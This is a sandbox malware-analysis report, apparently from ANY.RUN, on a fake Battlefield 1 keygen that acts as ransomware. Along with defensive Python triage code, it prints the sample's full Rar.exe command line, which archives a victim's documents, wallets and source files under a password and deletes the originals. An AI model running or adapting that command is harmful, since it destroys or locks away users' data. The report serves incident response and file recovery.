c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\program files\winrar\rar.exe
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\iconcodecservice.dll

PID
3036
CMD
"C:\Program Files\Winrar\Rar.exe" u C:\YOUR-locked-FILES\YourFilesHere-0penWithWinrar.ace -inul -os -ow -r -df -pfW?3*m6P7Ek$Qi/5 -x*.rar C:\*.txt C:\*.doc* C:\*.xls* C:\*.ppt* C:\*.zip C:\*.mdb C:\*.acc* C:\*.mdb* C:\*.avi* C:\*.wma* C:\*.csv* *.csv* C:\*.jpg* C:\*.png* C:\*.svg* C:\*.wallet* C:\*.eps* C:\*.pdf* C:\*.psd* C:\*.dxg* C:\*.dwg* *.rar* *.7z* *.php* *.css* *.js* *.cfm* *.cfc* *.sql* *.tar* *.backup* *.html *.dat *.sln *.c *.MYD *.MYI *.frm
Path
C:\Program Files\Winrar\Rar.exe
Indicators
No indicators
Parent process
Battlefield-1-Keygen-Serial-Key-Generator.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Alexander Roshal
Description
Command line RAR
Version
5.60.0
Modules
Image
c:\program files\winrar\rar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
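
The command line recorded for PID 3036 is the whole "encryption" routine: Rar.exe is told to update (`u`) a password-protected archive under C:\YOUR-locked-FILES\ from a list of document masks, recursing (`-r`) and deleting each source file once archived (`-df`), silently (`-inul`). Two things follow for a responder. First, the password is passed as `-p<password>` on the command line, so any process-creation audit that captures command lines (Sysmon Event ID 1, Windows 4688 with command-line auditing) has preserved the recovery key. Second, `-p` encrypts file data only (`-hp` would also encrypt headers), so `rar l` lists the archived file names without the password. The archive name ends in .ace, but Rar.exe writes RAR format, which a signature check confirms. The block below is an added example, not ANY.RUN code: it parses the captured command line (copied verbatim from this report), extracts these switches and derives the recovery command; `RarInvocation`, `parse_rar_cmdline`, `affected_patterns`, `recovery_command` and `rar_signature` are this example's own names, and the switch semantics follow the WinRAR manual.

```python
"""Triage of the Rar.exe command line captured for PID 3036 in this report.

Added example, not part of the ANY.RUN report. CAPTURED_CMDLINE is the
command line from the report; everything else (names, recovery command)
is this example's own. RAR switch meanings follow the WinRAR manual.
"""
import shlex
from dataclasses import dataclass, field
from typing import List, Optional

CAPTURED_CMDLINE = r'''"C:\Program Files\Winrar\Rar.exe" u C:\YOUR-locked-FILES\YourFilesHere-0penWithWinrar.ace -inul -os -ow -r -df -pfW?3*m6P7Ek$Qi/5 -x*.rar C:\*.txt C:\*.doc* C:\*.xls* C:\*.ppt* C:\*.zip C:\*.mdb C:\*.acc* C:\*.mdb* C:\*.avi* C:\*.wma* C:\*.csv* *.csv* C:\*.jpg* C:\*.png* C:\*.svg* C:\*.wallet* C:\*.eps* C:\*.pdf* C:\*.psd* C:\*.dxg* C:\*.dwg* *.rar* *.7z* *.php* *.css* *.js* *.cfm* *.cfc* *.sql* *.tar* *.backup* *.html *.dat *.sln *.c *.MYD *.MYI *.frm'''

RAR4_SIG = b"Rar!\x1a\x07\x00"        # RAR 1.5 - 4.x archive signature
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"    # RAR 5.0 archive signature


@dataclass
class RarInvocation:
    command: str                                        # e.g. "u" (update), "a" (add), "x" (extract)
    archive: str                                        # archive the files are moved into
    masks: List[str]                                    # include masks
    excludes: List[str] = field(default_factory=list)   # -x<mask>, takes precedence over include masks
    password: Optional[str] = None                      # -p<pwd> / -hp<pwd>
    headers_encrypted: bool = False                     # -hp also encrypts file names
    delete_after: bool = False                          # -df delete, -dr recycle bin, -dw wipe
    recurse: bool = False                               # -r
    raw_switches: List[str] = field(default_factory=list)


def parse_rar_cmdline(cmdline: str) -> RarInvocation:
    """Split 'rar <command> [-switches] <archive> [masks...]' from a Windows command line."""
    # posix=False keeps backslashes literal and honours only double quotes.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if len(tokens) < 2:
        raise ValueError("no RAR command on the command line")
    inv = RarInvocation(command=tokens[1], archive="", masks=[])
    switches_allowed = True
    for tok in tokens[2:]:
        if switches_allowed and tok == "--":            # RAR: end of switches
            switches_allowed = False
            continue
        if switches_allowed and tok.startswith("-"):
            sw = tok[1:]
            inv.raw_switches.append(sw)
            low = sw.lower()
            if low.startswith("hp") and low != "hp":
                inv.password, inv.headers_encrypted = sw[2:], True
            elif low.startswith("p") and low not in ("p", "p-"):   # bare -p prompts, -p- disables
                inv.password = sw[1:]                                # passwords are case-sensitive
            elif low in ("df", "dr", "dw"):
                inv.delete_after = True
            elif low in ("r", "r0"):
                inv.recurse = True
            elif low.startswith("x"):
                inv.excludes.append(sw[1:])
            continue                                    # -inul, -os, -ow etc. are kept only in raw_switches
        if not inv.archive:
            inv.archive = tok
        else:
            inv.masks.append(tok)
    return inv


def affected_patterns(inv: RarInvocation) -> List[str]:
    """Distinct '*.ext' patterns targeted, with drive/directory stripped and case folded."""
    return sorted({m.rsplit("\\", 1)[-1].lower() for m in inv.masks})


def recovery_command(inv: RarInvocation, dest: str) -> Optional[str]:
    """Extraction command restoring the originals, if the password was captured.
    The destination is left unquoted and ends in a backslash: RAR needs the
    trailing backslash, and a quoted trailing backslash would escape the quote
    under Windows argv rules."""
    if inv.password is None:
        return None
    dest_dir = dest.rstrip("\\") + "\\"
    return f'rar x -p{inv.password} "{inv.archive}" {dest_dir}'


def rar_signature(head: bytes) -> Optional[str]:
    """Identify a RAR archive from its first bytes regardless of the file extension."""
    if head.startswith(RAR5_SIG):
        return "RAR5"
    if head.startswith(RAR4_SIG):
        return "RAR4"
    return None


if __name__ == "__main__":
    inv = parse_rar_cmdline(CAPTURED_CMDLINE)
    print(f"command={inv.command} archive={inv.archive}")
    print(f"password={inv.password!r} headers_encrypted={inv.headers_encrypted} "
          f"delete_after={inv.delete_after} recurse={inv.recurse} excludes={inv.excludes}")
    print(f"{len(affected_patterns(inv))} distinct patterns, e.g. {affected_patterns(inv)[:6]}")
    print(recovery_command(inv, r"D:\restore"))
```

Before running the recovery command on a victim machine, copy the .ace file off the host and check `rar_signature` on its first eight bytes; if the write was interrupted the archive may be truncated, and `rar r` (repair) rather than `x` is the next step. Note that `-x*.rar` excludes .rar files even though `*.rar*` appears among the include masks, since RAR applies exclusions first.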

PID
992
CMD
C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
Path
C:\Windows\system32\DllHost.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
COM Surrogate
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\dllhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\windows photo viewer\photoviewer.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\version.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\d3d9.dll
c:\windows\system32\d3d8thk.dll
c:\windows\system32\slc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\windows photo viewer\photobase.dll
c:\windows\system32\propsys.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\actxprxy.dll
c:\program files\windows photo viewer\imagingengine.dll
c:\windows\system32\mscms.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\thumbcache.dll
c:\windows\system32\psapi.dll
c:\windows\system32\icm32.dll
c:\windows\system32\linkinfo.dll

Registry activity

Total events
560
Read events
543
Write events
17
Delete events
0

Modification events

PID  Process  Operation  Key  Name = Value
2620  WinRAR.exe  write  HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes  ShellExtBMP (no value recorded)
2620  WinRAR.exe  write  HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes  ShellExtIcon (no value recorded)
2620  WinRAR.exe  write  HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E  LanguageList = en-US
2620  WinRAR.exe  write  HKEY_CURRENT_USER\Software\WinRAR\ArcHistory  0 = C:\Users\admin\AppData\Local\Temp\Battlefield-1-Keygen-Serial-Key-Generator.rar
2620  WinRAR.exe  write  HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths  name = 120
2620  WinRAR.exe  write  HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths  size = 80
2620  WinRAR.exe  write  HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths  type = 120
2620  WinRAR.exe  write  HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths  mtime = 100
2620  WinRAR.exe  write  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap  UNCAsIntranet = 0
2620  WinRAR.exe  write  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap  AutoDetect = 1
2484  Battlefield-1-Keygen-Serial-Key-Generator.exe  write  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap  UNCAsIntranet = 0
2484  Battlefield-1-Keygen-Serial-Key-Generator.exe  write  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap  AutoDetect = 1
992  DllHost.exe  write  HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication  Name = DllHost.exe

The sample's own registry writes are limited to the two Internet Settings ZoneMap values that WinRAR.exe also writes; no Run key or other persistence location appears among the recorded modifications, consistent with the "Process was added to the startup" marker not being set.

Files activity

Executable files
3
Suspicious files
0
Text files
14
Unknown types
0

Dropped files

WinRAR.exe extracted the same executable (identical MD5/SHA256) into three temporary directories (Rar$EXa2620.4422, .2142 and .4088); only the .2142 copy appears as a monitored process. The sample writes four copies each of a ransom note in three formats to the desktop (RecoverYourFiles*.rtf, .htm and .bmp, one hash per format) plus its .NET user settings under AppData\Local\Runners. The archive that Rar.exe was instructed to build (C:\YOUR-locked-FILES\YourFilesHere-0penWithWinrar.ace) is not among the listed files.

PID
Process
Filename
Type
2620
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.4422\Battlefield-1-Keygen-Serial-Key-Generator.exe
executable
MD5: 5424427b66ab5f107f278acf72182b4b
SHA256: 3a2dd7c89418ff6ccc58dca8558136229682ecf01c9c01ae4e53a9a919632e31
2620
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.2142\Battlefield-1-Keygen-Serial-Key-Generator.exe
executable
MD5: 5424427b66ab5f107f278acf72182b4b
SHA256: 3a2dd7c89418ff6ccc58dca8558136229682ecf01c9c01ae4e53a9a919632e31
2620
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.4088\Battlefield-1-Keygen-Serial-Key-Generator.exe
executable
MD5: 5424427b66ab5f107f278acf72182b4b
SHA256: 3a2dd7c89418ff6ccc58dca8558136229682ecf01c9c01ae4e53a9a919632e31
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles2.rtf
text
MD5: e9687094535e7e895b8875d6155bdc97
SHA256: ab6478f9966f617bc3c07c2ad560a47981684a939d11ff41dd03d9241a0fa429
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles4.bmp
image
MD5: 7a4a983ed6c15eb936d2a0533db33c10
SHA256: bdac1b859527d4ee1ea1467c046f259d958a6115f40bc338c4335beded3560c0
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles3.bmp
image
MD5: 7a4a983ed6c15eb936d2a0533db33c10
SHA256: bdac1b859527d4ee1ea1467c046f259d958a6115f40bc338c4335beded3560c0
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles2.bmp
image
MD5: 7a4a983ed6c15eb936d2a0533db33c10
SHA256: bdac1b859527d4ee1ea1467c046f259d958a6115f40bc338c4335beded3560c0
2484

Find more information about the static content and download it in the full report

Network activity

HTTP(S) requests
10
TCP/UDP connections
31
DNS requests
91
Threats
2

HTTP requests


Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections


DNS requests


Threats

PID Process Class Message
–– –– Potentially Bad Traffic ET INFO Observed DNS Query to .cloud TLD
–– –– Potentially Bad Traffic ET INFO Observed DNS Query to .cloud TLD

Debug output strings

No debug info.